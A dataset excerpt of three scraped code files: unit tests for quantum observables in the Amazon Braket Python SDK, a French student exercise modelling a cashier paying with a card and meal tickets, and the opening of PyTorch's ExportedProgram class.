OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [1, 2],\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) q[1], q[2]\",\n ),\n (\n Observable.Hermitian(np.eye(4)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [1, 2],\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) $1, $2\",\n ),\n (\n Observable.Hermitian(np.eye(2)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"hermitian([[1+0im, 0im], [0im, 1+0im]]) all\",\n ),\n (\n Observable.H() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3, 0],\n \"h(q[3]) @ z(q[0])\",\n ),\n (\n Observable.H() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0],\n \"h($3) @ z($0)\",\n ),\n (\n Observable.H() @ Observable.Z() @ Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3, 0, 1],\n \"h(q[3]) @ z(q[0]) @ i(q[1])\",\n ),\n (\n Observable.H() @ Observable.Z() @ Observable.I(),\n 
OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0, 1],\n \"h($3) @ z($0) @ i($1)\",\n ),\n (\n Observable.Hermitian(np.eye(4)) @ Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3, 0, 1],\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) q[3], q[0]\"\n \" @ i(q[1])\",\n ),\n (\n Observable.I() @ Observable.Hermitian(np.eye(4)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0, 1],\n \"i($3) @ \"\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) $0, $1\",\n ),\n (\n (2 * Observable.Z()) @ (3 * Observable.H()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 3],\n \"6 * z($3) @ h($3)\",\n ),\n (\n (2 * Observable.Z()) @ (3 * Observable.H()) @ (2 * Observable.Y()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 3, 1],\n \"12 * z($3) @ h($3) @ y($1)\",\n ),\n (\n 3 * (2 * Observable.Z()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"6 * z($3)\",\n ),\n (\n (2 * Observable.I()) @ (2 * Observable.Hermitian(np.eye(4))),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3, 0, 1],\n \"4 * i($3) @ \"\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) $0, $1\",\n ),\n (\n Observable.Z() + 2 * Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [4]],\n \"z($3) + 2 * h($4)\",\n ),\n (\n 3 * (Observable.H() + 2 * Observable.X()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [0]],\n \"3 * h($3) + 6 * x($0)\",\n ),\n (\n 3 * (Observable.H() + 2 * Observable.H()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [3]],\n \"3 * h($3) + 6 * h($3)\",\n ),\n (\n 3 * (Observable.H() + 2 * Observable.H()),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[3], [5]],\n \"3 * h($3) + 6 * h($5)\",\n ),\n (\n (2 * Observable.Y()) @ (3 * Observable.I()) + 0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[0, 1], [0, 1]],\n \"6 * y($0) @ i($1) + 0.75 * y($0) @ z($1)\",\n ),\n (\n (-2 * Observable.Y()) @ (3 * Observable.I()) + -0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[0, 1], [0, 1]],\n \"-6 * y($0) @ i($1) - 0.75 * y($0) @ z($1)\",\n ),\n (\n 4 * (2 * Observable.Z() + 2 * (3 * Observable.X() @ (2 * Observable.Y()))),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [[0], [1, 2]],\n \"8 * z($0) + 48 * x($1) @ y($2)\",\n ),\n ],\n)\ndef test_observables_to_ir_openqasm(observable, serialization_properties, target, expected_ir):\n assert (\n observable.to_ir(\n target, ir_type=IRType.OPENQASM, serialization_properties=serialization_properties\n )\n == expected_ir\n )\n\n\n@pytest.mark.parametrize(\n \"observable\",\n [\n 2 * Observable.H(),\n 3 * Observable.Z(),\n 2 * Observable.I(),\n 3 * Observable.X(),\n 2 * Observable.Y(),\n 2 * Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]])),\n 2 * 
Observable.TensorProduct([Observable.Z(), Observable.H()]),\n ],\n)\ndef test_observable_coef_jaqcd(observable):\n coef_not_supported_with_jaqcd = \"Observable coefficients not supported with Jaqcd\"\n with pytest.raises(ValueError, match=coef_not_supported_with_jaqcd):\n observable.to_ir(target=0, ir_type=IRType.JAQCD)\n\n\n@pytest.mark.parametrize(\n \"expression, observable\",\n [\n ([], Observable.X()),\n ([2], Observable.Y()),\n ([2, \"invalid_str\"], Observable.Z()),\n ([2.0], Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]]))),\n ([2], Observable.Sum([Observable.X() + Observable.Y()])),\n ([2], Observable.Y() + 0.75 * Observable.Y() @ Observable.Z()),\n ],\n)\ndef test_invalid_scalar_multiplication(expression, observable):\n with pytest.raises(TypeError, match=\"Observable coefficients must be numbers.\"):\n expression * observable\n\n\n@pytest.mark.parametrize(\n \"observable, matrix\",\n [\n (\n (-3 * Observable.H()).to_matrix(),\n np.array(\n [[-2.12132034 + 0.0j, -2.12132034 + 0.0j], [-2.12132034 + 0.0j, 2.12132034 - 0.0j]]\n ),\n ),\n (\n (3 * Observable.Z()).to_matrix(),\n np.array([[3.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, -3.0 + 0.0j]]),\n ),\n (\n (2 * Observable.I()).to_matrix(),\n np.array([[2.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, 2.0 + 0.0j]]),\n ),\n (\n (1.2 * Observable.X()).to_matrix(),\n np.array([[0.0 + 0.0j, 1.2 + 0.0j], [1.2 + 0.0j, 0.0 + 0.0j]]),\n ),\n (\n (1e-2 * Observable.Y()).to_matrix(),\n np.array([[0.0 + 0.0j, 0.0 - 0.01j], [0 + 0.01j, 0.0 + 0.0j]]),\n ),\n (\n (np.array(1.3) * Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]]))).to_matrix(),\n np.array([[0.0 + 0.0j, 1.3 + 0.0j], [1.3 + 0.0j, 0.0 + 0.0j]]),\n ),\n (\n (2 * Observable.TensorProduct([Observable.Z(), Observable.H()])).to_matrix(),\n np.array(\n [\n [1.41421356 + 0.0j, 1.41421356 + 0.0j, 0.0 + 0.0j, 0.0 + 0.0j],\n [1.41421356 + 0.0j, -1.41421356 + 0.0j, 0.0 + 0.0j, -0.0 + 0.0j],\n [0.0 + 0.0j, 0.0 + 0.0j, -1.41421356 + 0.0j, -1.41421356 + 0.0j],\n [0.0 + 0.0j, -0.0 + 0.0j, -1.41421356 + 0.0j, 1.41421356 + 0.0j],\n ],\n ),\n ),\n ],\n)\ndef test_valid_scaled_matrix(observable, matrix):\n npt.assert_allclose(observable, matrix)\n\n\n@pytest.mark.parametrize(\n \"observable, eigenvalue\",\n [\n (-2 * Observable.I().eigenvalues, np.array([-2.0, -2.0])),\n (\n 3e-2 * Observable.Hermitian(matrix=np.array([[0, 1], [1, 0]])).eigenvalues,\n np.array([-0.03, 0.03]),\n ),\n ],\n)\ndef test_valid_scaled_eigenvalues(observable, eigenvalue):\n npt.assert_allclose(observable, eigenvalue)\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_gate_equality(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n assert testobject.qubit_count == gateobject.qubit_count\n assert testobject.ascii_symbols == gateobject.ascii_symbols\n assert testobject.matrix_equivalence(gateobject)\n assert testobject.basis_rotation_gates == basis_rotation_gates\n assert np.allclose(testobject.eigenvalues, eigenvalues)\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_basis_rotation_gates(\n testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues\n):\n assert testobject.basis_rotation_gates == basis_rotation_gates\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_eigenvalues(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n 
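The scaling fixtures above are plain linear algebra: multiplying an observable by a scalar c scales both its matrix and its eigenvalues by c. A quick numpy check for 3 * Z:

import numpy as np

Z = np.array([[1, 0], [0, -1]], dtype=complex)
scaled = 3 * Z
np.testing.assert_allclose(np.linalg.eigvalsh(scaled), [-3.0, 3.0])
np.testing.assert_allclose(scaled, [[3, 0], [0, -3]])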
compare_eigenvalues(testobject, eigenvalues)\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_observable_from_ir(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n assert testobject == observable_from_ir(expected_ir)\n\n\n# Hermitian\n\n\n@pytest.mark.parametrize(\"matrix\", invalid_hermitian_matrices)\ndef test_hermitian_invalid_matrix(matrix):\n with pytest.raises(ValueError):\n Observable.Hermitian(matrix=matrix)\n\n\ndef test_hermitian_equality():\n matrix = Observable.H().to_matrix()\n a1 = Observable.Hermitian(matrix=matrix)\n a2 = Observable.Hermitian(matrix=matrix)\n a3 = Observable.Hermitian(matrix=Observable.I().to_matrix())\n a4 = \"hi\"\n assert a1 == a2\n assert a1 != a3\n assert a1 != a4\n\n\ndef test_hermitian_to_ir():\n matrix = Observable.I().to_matrix()\n obs = Observable.Hermitian(matrix=matrix)\n assert obs.to_ir() == [[[[1, 0], [0, 0]], [[0, 0], [1, 0]]]]\n\n\n@pytest.mark.parametrize(\n \"matrix,eigenvalues\",\n [\n (np.array([[1.0, 0.0], [0.0, 1.0]]), np.array([1, 1])),\n (np.array([[0, -1j], [1j, 0]]), np.array([-1.0, 1.0])),\n (np.array([[1, 1 - 1j], [1 + 1j, -1]]), np.array([-np.sqrt(3), np.sqrt(3)])),\n ],\n)\ndef test_hermitian_eigenvalues(matrix, eigenvalues):\n compare_eigenvalues(Observable.Hermitian(matrix=matrix), eigenvalues)\n\n\ndef test_flattened_tensor_product():\n observable_one = Observable.Z() @ Observable.Y()\n observable_two = Observable.X() @ Observable.H()\n actual = Observable.TensorProduct([observable_one, observable_two])\n expected = Observable.TensorProduct(\n [Observable.Z(), Observable.Y(), Observable.X(), Observable.H()]\n )\n assert expected == actual\n\n\n@pytest.mark.parametrize(\n \"matrix,basis_rotation_matrix\",\n [\n (\n np.array([[0.0, 1.0], [1.0, 0.0]]),\n np.array([[-0.70710678, 0.70710678], [0.70710678, 0.70710678]]).conj().T,\n ),\n (\n np.array([[0, -1j], [1j, 0]]),\n np.array(\n [[-0.70710678 + 0.0j, -0.70710678 + 0.0j], [0.0 + 0.70710678j, 0.0 - 0.70710678j]]\n )\n .conj()\n .T,\n ),\n (\n np.array([[1, 1 - 1j], [1 + 1j, -1]]),\n np.array(\n [\n [-0.45970084 - 0.0j, 0.62796303 - 0.62796303j],\n [-0.88807383 - 0.0j, -0.32505758 + 0.32505758j],\n ]\n ),\n ),\n ],\n)\ndef test_hermitian_basis_rotation_gates(matrix, basis_rotation_matrix):\n expected_unitary = Gate.Unitary(matrix=basis_rotation_matrix)\n actual_rotation_gates = Observable.Hermitian(matrix=matrix).basis_rotation_gates\n assert actual_rotation_gates == tuple([expected_unitary])\n assert expected_unitary.matrix_equivalence(actual_rotation_gates[0])\n\n\ndef test_observable_from_ir_hermitian_value_error():\n ir_observable = [[[[1.0, 0], [0, 1]], [[0.0, 1], [1, 0]]]]\n with pytest.raises(ValueError):\n observable_from_ir(ir_observable)\n\n\ndef test_observable_from_ir_hermitian():\n ir_observable = [[[[1, 0], [0, 0]], [[0, 0], [1, 0]]]]\n actual_observable = observable_from_ir(ir_observable)\n assert actual_observable == Observable.Hermitian(matrix=np.array([[1.0, 0.0], [0.0, 1.0]]))\n\n\ndef test_hermitian_str():\n assert (\n str(Observable.Hermitian(matrix=np.array([[1.0, 0.0], [0.0, 1.0]])))\n == \"Hermitian('qubit_count': 1, 'matrix': [[1.+0.j 0.+0.j], [0.+0.j 1.+0.j]])\"\n )\n\n\n# TensorProduct\n\n\ndef test_tensor_product_to_ir():\n t = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n assert t.to_ir() == [\"z\", \"i\", \"x\"]\n assert t.qubit_count == 3\n assert t.ascii_symbols == tuple([\"Z@I@X\"] * 3)\n\n\ndef 
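The Hermitian eigenvalue fixture [[1, 1-1j], [1+1j, -1]] with eigenvalues -sqrt(3) and sqrt(3) used above can be verified directly: the matrix is traceless with determinant -3, and numpy agrees:

import numpy as np

H = np.array([[1, 1 - 1j], [1 + 1j, -1]])
print(np.linalg.eigvalsh(H))   # [-1.7320508  1.7320508]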
test_tensor_product_matmul_tensor():\n t1 = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n t2 = Observable.TensorProduct(\n [Observable.Hermitian(matrix=Observable.I().to_matrix()), Observable.Y()]\n )\n t3 = t1 @ t2\n assert t3.to_ir() == [\"z\", \"i\", \"x\", [[[1.0, 0], [0, 0]], [[0, 0], [1.0, 0]]], \"y\"]\n assert t3.qubit_count == 5\n assert t3.ascii_symbols == tuple([\"Z@I@X@Hermitian@Y\"] * 5)\n\n\ndef test_tensor_product_matmul_observable():\n t1 = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n o1 = Observable.I()\n t = t1 @ o1\n assert t.to_ir() == [\"z\", \"i\", \"x\", \"i\"]\n assert t.qubit_count == 4\n assert t.ascii_symbols == tuple([\"Z@I@X@I\"] * 4)\n\n\ndef test_tensor_product_eigenvalue_index_out_of_bounds():\n obs = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n with pytest.raises(ValueError):\n obs.eigenvalue(8)\n\n\ndef test_tensor_product_value_error():\n with pytest.raises(ValueError):\n Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()]) @ \"a\"\n\n\ndef test_tensor_product_rmatmul_observable():\n t1 = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n o1 = Observable.I()\n t = o1 @ t1\n assert t.to_ir() == [\"i\", \"z\", \"i\", \"x\"]\n assert t.qubit_count == 4\n assert t.ascii_symbols == tuple([\"I@Z@I@X\"] * 4)\n\n\n@pytest.mark.parametrize(\n \"observable,eigenvalues\",\n [\n (Observable.X() @ Observable.Y(), np.array([1, -1, -1, 1])),\n (Observable.X() @ Observable.Y() @ Observable.Z(), np.array([1, -1, -1, 1, -1, 1, 1, -1])),\n (Observable.X() @ Observable.Y() @ Observable.I(), np.array([1, 1, -1, -1, -1, -1, 1, 1])),\n (\n Observable.X()\n @ Observable.Hermitian(\n np.array([[-1, 0, 0, 0], [0, -1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])\n )\n @ Observable.Y(),\n np.array([-1, 1, -1, 1, 1, -1, 1, -1, 1, -1, 1, -1, -1, 1, -1, 1]),\n ),\n ],\n)\ndef test_tensor_product_eigenvalues(observable, eigenvalues):\n compare_eigenvalues(observable, eigenvalues)\n # Test caching\n observable._factors = ()\n compare_eigenvalues(observable, eigenvalues)\n\n\n@pytest.mark.parametrize(\n \"observable,basis_rotation_gates\",\n [\n (Observable.X() @ Observable.Y(), tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()])),\n (\n Observable.X() @ Observable.Y() @ Observable.Z(),\n tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()]),\n ),\n (\n Observable.X() @ Observable.Y() @ Observable.I(),\n tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()]),\n ),\n (Observable.X() @ Observable.H(), tuple([Gate.H(), Gate.Ry(-np.pi / 4)])),\n ],\n)\ndef test_tensor_product_basis_rotation_gates(observable, basis_rotation_gates):\n assert observable.basis_rotation_gates == basis_rotation_gates\n\n\ndef test_observable_from_ir_tensor_product():\n expected_observable = Observable.TensorProduct([Observable.Z(), Observable.I(), Observable.X()])\n actual_observable = observable_from_ir([\"z\", \"i\", \"x\"])\n assert expected_observable == actual_observable\n\n\ndef test_observable_from_ir_tensor_product_value_error():\n with pytest.raises(ValueError):\n observable_from_ir([\"z\", \"i\", \"foo\"])\n\n\ndef compare_eigenvalues(observable, expected):\n assert np.allclose(observable.eigenvalues, expected)\n assert np.allclose(\n np.array([observable.eigenvalue(i) for i in range(2**observable.qubit_count)]),\n expected,\n )\n\n\ndef test_sum_not_allowed_in_tensor_product():\n sum_not_allowed_in_tensor_product = \"Sum observables not allowed in TensorProduct\"\n with 
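The tensor-product eigenvalue fixtures above fall out of the Kronecker structure: the eigenvalue list of a product observable is the Kronecker product of the factors' eigenvalue lists, in computational-basis order:

import numpy as np

pauli = np.array([1, -1])                      # eigenvalues of X, Y, Z alike
print(np.kron(pauli, pauli))                   # [ 1 -1 -1  1], the X @ Y case
print(np.kron(np.kron(pauli, pauli), pauli))   # the X @ Y @ Z fixture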
pytest.raises(TypeError, match=sum_not_allowed_in_tensor_product):\n Observable.TensorProduct([Observable.X() + Observable.Y()])\n\n\n# Sum of observables\n\n\n@pytest.mark.parametrize(\n \"observable,basis_rotation_gates\",\n [\n (Observable.X() + Observable.Y(), tuple([Gate.H(), Gate.Z(), Gate.S(), Gate.H()])),\n ],\n)\ndef test_no_basis_rotation_support_for_sum(observable, basis_rotation_gates):\n no_basis_rotation_support_for_sum = \"Basis rotation calculation not supported for Sum\"\n with pytest.raises(NotImplementedError, match=no_basis_rotation_support_for_sum):\n observable.basis_rotation_gates\n\n\ndef test_no_eigenvalues_support_for_sum():\n no_eigen_value_support = \"Eigenvalue calculation not supported for Sum\"\n with pytest.raises(NotImplementedError, match=no_eigen_value_support):\n (Observable.X() + Observable.Y()).eigenvalues\n\n\ndef test_matrix_not_supported_for_sum():\n matrix_not_supported = \"Matrix operation is not supported for Sum\"\n with pytest.raises(NotImplementedError, match=matrix_not_supported):\n (Observable.X() + Observable.Y()).to_matrix()\n\n\ndef test_invalid_targets_config_for_sum_obs():\n observable, serialization_properties = (\n 2 * Observable.X() @ Observable.Y() + 0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n )\n target = [[0, 1]]\n\n target_len_mismatch_for_sum_terms = \"Invalid target of length 1 for Sum with 2 terms\"\n\n with pytest.raises(ValueError, match=target_len_mismatch_for_sum_terms):\n observable.to_ir(\n target, ir_type=IRType.OPENQASM, serialization_properties=serialization_properties\n )\n\n\ndef test_sum_obs_str():\n assert (\n str(Observable.Sum([2 * Observable.X() + 3 * Observable.Y()]))\n == \"Sum(X('qubit_count': 1), Y('qubit_count': 1))\"\n )\n\n\ndef test_str_equality_sum_obs():\n t1 = Observable.Sum([2 * Observable.X() + 3 * Observable.Y()])\n t2 = Observable.Sum([2 * Observable.X() + 3 * Observable.Y()])\n t3 = Observable.Sum([2 * Observable.Z() + 3 * Observable.H()])\n t4 = Observable.Sum([Observable.Z() + Observable.H()])\n assert t1 == t2\n assert t2 != t3\n assert t1 != t3\n assert t3 == t4\n\n\ndef test_invalid_target_length_for_sum_obs_term():\n observable, serialization_properties = (\n 2 * Observable.Y() + 0.75 * Observable.Y() @ Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n )\n target = [[0, 1], [0, 1]]\n\n invalid_target_len_for_term = \"Invalid target for term 0 of Sum. 
Expected 1 targets, got 2\"\n\n with pytest.raises(ValueError, match=invalid_target_len_for_term):\n observable.to_ir(\n target, ir_type=IRType.OPENQASM, serialization_properties=serialization_properties\n )\n\n\ndef test_unscaled_tensor_product():\n observable = 3 * ((2 * Observable.X()) @ (5 * Observable.Y()))\n assert observable == 30 * (Observable.X() @ Observable.Y())\n assert observable._unscaled() == Observable.X() @ Observable.Y()\n","repo_name":"amazon-braket/amazon-braket-sdk-python","sub_path":"test/unit_tests/braket/circuits/test_observables.py","file_name":"test_observables.py","file_ext":"py","file_size_in_byte":24836,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"72"} +{"seq_id":"38126948160","text":"#TP4 SVL\n\nfrom carte import Carte\n\nclass Caisse:\n \"\"\"\n Ainsi qu'un nouvel objet Caisse\n >>> caisse = Caisse()\n\n On a également besoin d'un objet Carte\n >>> carte = Carte(200,2,8)\n\n On peut ensuite décider de payer sans utiliser\n de ticket quand le solde est suffisant\n >>> caisse.payerSansTicket(carte,10)\n\n Le solde de la carte vaut à présent 190\n >>> carte.getSolde()\n 190\n\n On paye à présent avec une carte dont\n le solde est insuffisant\n >>> carte = Carte(10,5,8)\n >>> caisse.payerSansTicket(carte,13)\n Traceback (most recent call last):\n ...\n ValueError\n\n On veut à présent payer en utilisant les\n tickets pour un montant qui est inférieur\n à la valeur d'un ticket\n >>> caisse.payerAvecTicket(carte,7)\n\n Un ticket a été débité de la carte\n >>> carte.getTickets()\n 4\n\n On veut à présent payer avec un ticket dont\n le montant est inférieur au montant dû\n >>> caisse.payerAvecTicket(carte,10)\n\n Dans ce cas, un ticket est débité de la\n carte mais le reste dû est également\n débité du solde de la carte\n >>> carte.getTickets()\n 3\n >>> carte.getSolde()\n 8\n\n A présent, on souhaite payer avec un ticket\n pour un montant supérieur à la valeur d'un\n ticket mais sans avoir un solde suffisant\n sur la carte\n >>> carte = Carte(2,3,8)\n >>> caisse.payerAvecTicket(carte,15)\n Traceback (most recent call last):\n ...\n ValueError\n\n Enfin, on souhaite payer avec un ticket\n sans aucun ticket sur la carte\n >>> carte = Carte(100,0,8)\n >>> caisse.payerAvecTicket(carte,10)\n\n Dans ce cas là, c'est le solde de la carte\n qui est débité:\n >>> carte.getSolde()\n 90\n\n \"\"\"\n def payerSansTicket(self, carte, montant):\n \"\"\"\n Permet de payer un certain montant avec\n une carte sans utiliser de ticket.\n\n Une exception est levée si le solde\n est inférieur au montant dû.\n \"\"\"\n solde = carte.getSolde()\n if solde >= montant:\n carte.debiter(montant)\n else:\n raise ValueError()\n\n def payerAvecTicket(self, carte, montant):\n \"\"\"\n Permet de payer un certain montant\n avec un ticket.\n\n On débite un ticket de la carte si\n il y en a au moins 1 et ensuite on\n débite le solde de carte si le montant\n dû est supérieur à la valeur d'un ticket.\n\n Enfin, on débite le solde de la carte si\n le solde est suffisant et que le nombre de\n ticket est insuffisant.\n\n Une exception est levée si le solde de\n la carte est inférieur au montant dû.\n \"\"\"\n ticket = carte.getTickets()\n valeurTicket = carte.getTicketValue()\n if ticket >= 1:\n carte.debiterAvecTicket()\n if valeurTicket < montant:\n self.payerSansTicket(carte, montant - valeurTicket)\n else:\n self.payerSansTicket(carte, 
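test_unscaled_tensor_product above reduces to scalars factoring out of a Kronecker product, (aA) kron (bB) == ab * (A kron B), which is easy to confirm numerically:

import numpy as np

A = np.array([[0, 1], [1, 0]], dtype=complex)       # X
B = np.array([[0, -1j], [1j, 0]])                   # Y
np.testing.assert_allclose(np.kron(2 * A, 5 * B), 10 * np.kron(A, B))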
montant)\n","repo_name":"quentin-burg/tp-svl","sub_path":"TP4/caisse.py","file_name":"caisse.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14832148209","text":"import copy\nimport dataclasses\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterator,\n List,\n Optional,\n Tuple,\n Type,\n TYPE_CHECKING,\n Union,\n)\n\nif TYPE_CHECKING:\n # Import the following modules during type checking to enable code intelligence features,\n # such as auto-completion in tools like pylance, even when these modules are not explicitly\n # imported in user code.\n\n import sympy\n\n from torch.utils._sympy.value_ranges import ValueRanges\n\nimport torch\nimport torch.fx._pytree as fx_pytree\nimport torch.utils._pytree as pytree\nfrom torch.fx._compatibility import compatibility\n\nfrom torch.fx.passes.infra.pass_base import PassResult\nfrom torch.fx.passes.infra.pass_manager import PassManager\n\nfrom .graph_signature import ( # noqa: F401\n _sig_to_specs,\n ArgumentSpec,\n ConstantArgument,\n ExportGraphSignature,\n InputKind,\n InputSpec,\n OutputKind,\n OutputSpec,\n SymIntArgument,\n TensorArgument,\n)\n\n\n__all__ = [\n \"ExportedProgram\",\n \"ModuleCallEntry\",\n \"ModuleCallSignature\",\n]\n\n\nPassType = Callable[[torch.fx.GraphModule], Optional[PassResult]]\n\n\n@dataclasses.dataclass\nclass ModuleCallSignature:\n inputs: List[ArgumentSpec]\n outputs: List[ArgumentSpec]\n in_spec: pytree.TreeSpec\n out_spec: pytree.TreeSpec\n\n\n@dataclasses.dataclass\nclass ModuleCallEntry:\n fqn: str\n signature: Optional[ModuleCallSignature] = None\n\n\nclass ExportedProgram:\n \"\"\"\n Package of a program from :func:`export`. It contains\n an :class:`torch.fx.Graph` that represents Tensor computation, a state_dict containing\n tensor values of all lifted parameters and buffers, and various metadata.\n\n You can call an ExportedProgram like the original callable traced by\n :func:`export` with the same calling convention.\n\n To perform transformations on the graph, use ``.module`` property to access\n an :class:`torch.fx.GraphModule`. You can then use\n `FX transformation `_\n to rewrite the graph. Afterwards, you can simply use :func:`export`\n again to construct a correct ExportedProgram.\n \"\"\"\n\n def __init__(\n self,\n root: Union[torch.nn.Module, Dict[str, Any]],\n graph: torch.fx.Graph,\n graph_signature: ExportGraphSignature,\n state_dict: Dict[str, Union[torch.Tensor, torch.nn.Parameter]],\n range_constraints: \"Dict[sympy.Symbol, Any]\",\n equality_constraints: List[Tuple[Any, Any]],\n module_call_graph: List[ModuleCallEntry],\n example_inputs: Optional[Tuple[Tuple[Any, ...], Dict[str, Any]]] = None,\n verifier: Optional[Type[Any]] = None, # TODO Change typing hint to Verifier.\n ):\n from torch._export.exported_program import _create_graph_module_for_export\n from torch._export.passes.add_runtime_assertions_for_constraints_pass import (\n InputDim,\n )\n\n # Remove codegen related things from the graph. 
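Walking through the Caisse logic above in English (Carte(solde, tickets, ticket_value), per its doctests): payerAvecTicket() burns one ticket when available and charges any remainder above the ticket's value to the card balance:

carte = Carte(100, 2, 8)
caisse = Caisse()
caisse.payerAvecTicket(carte, 10)   # one 8-unit ticket plus 2 from the balance
print(carte.getTickets(), carte.getSolde())   # 1 98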
It should just be a flat graph.\n graph._codegen = torch.fx.graph.CodeGen()\n self._graph_module = _create_graph_module_for_export(root, graph)\n if isinstance(root, torch.fx.GraphModule):\n self._graph_module.meta.update(root.meta)\n\n self._graph_signature: ExportGraphSignature = graph_signature\n self._state_dict: Dict[str, Any] = state_dict\n self._range_constraints: \"Dict[sympy.Symbol, ValueRanges]\" = range_constraints\n self._equality_constraints: List[\n Tuple[InputDim, InputDim]\n ] = equality_constraints\n self._module_call_graph: List[ModuleCallEntry] = module_call_graph\n self._example_inputs = example_inputs\n\n from torch._export.verifier import Verifier\n\n if verifier is None:\n verifier = Verifier\n assert issubclass(verifier, Verifier)\n self._verifier = verifier\n\n # Validate should be always the last step of the constructor.\n # TODO(zhxchen17) Uncomment the following line.\n # self.verifier().check(self)\n\n @property\n @compatibility(is_backward_compatible=False)\n def graph_module(self):\n return self._graph_module\n\n @property\n @compatibility(is_backward_compatible=False)\n def graph(self):\n return self.graph_module.graph\n\n @property\n @compatibility(is_backward_compatible=False)\n def graph_signature(self):\n return self._graph_signature\n\n @property\n @compatibility(is_backward_compatible=False)\n def state_dict(self):\n return self._state_dict\n\n @compatibility(is_backward_compatible=False)\n def parameters(self) -> Iterator[torch.nn.Parameter]:\n \"\"\"\n Returns an iterator over original module's parameters.\n \"\"\"\n for _, param in self.named_parameters():\n yield param\n\n @compatibility(is_backward_compatible=False)\n def named_parameters(self) -> Iterator[Tuple[str, torch.nn.Parameter]]:\n \"\"\"\n Returns an iterator over original module parameters, yielding\n both the name of the parameter as well as the parameter itself.\n \"\"\"\n for param_name in self.graph_signature.parameters:\n yield param_name, self.state_dict[param_name]\n\n @compatibility(is_backward_compatible=False)\n def buffers(self) -> Iterator[torch.Tensor]:\n \"\"\"\n Returns an iterator over original module buffers.\n \"\"\"\n for _, buf in self.named_buffers():\n yield buf\n\n @compatibility(is_backward_compatible=False)\n def named_buffers(self) -> Iterator[Tuple[str, torch.Tensor]]:\n \"\"\"\n Returns an iterator over original module buffers, yielding\n both the name of the buffer as well as the buffer itself.\n 